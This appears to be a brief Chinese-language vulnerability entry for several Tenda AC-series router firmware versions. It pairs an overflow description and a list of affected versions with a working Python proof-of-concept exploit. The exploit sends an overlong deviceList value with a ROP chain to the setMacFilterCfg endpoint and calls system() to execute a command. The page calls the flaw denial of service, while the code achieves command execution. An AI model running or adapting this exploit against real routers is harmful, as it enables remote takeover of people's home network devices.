漏洞分析文章 #
https://www.anquanke.com/post/id/204403#h2-7
漏洞描述 #
攻击者可利用该漏洞造成拒绝服务(覆盖函数的返回地址)。
漏洞影响 #
Tenda AC7 V15.03.06.44_CN版本;
AC9 V15.03.05.19(6318)_CN版本;
AC10 V15.03.06.23_CN版本;
AC15 V15.03.05.19_CN版本;
AC18 V15.03.05.19(6318)_CN版本;
分析文章poc
import requests from pwn import * cmd="echo hello" libc_base = 0xff58c000 system_offset = 0x5a270 gadget1_offset = 0x18298 gadget2_offset = 0x40cb8 system_addr = libc_base + system_offset gadget1 = libc_base + gadget1_offset gadget2 = libc_base + gadget2_offset payload = "A"*176 + p32(gadget1) + p32(system_addr) + p32(gadget2) + cmd url = "http://192.168.2.111/goform/setMacFilterCfg" cookie = {"Cookie":"password=12345"} data = {"macFilterType": "white", "deviceList": "r"+payload} requests.post(url, cookies=cookie, data=data)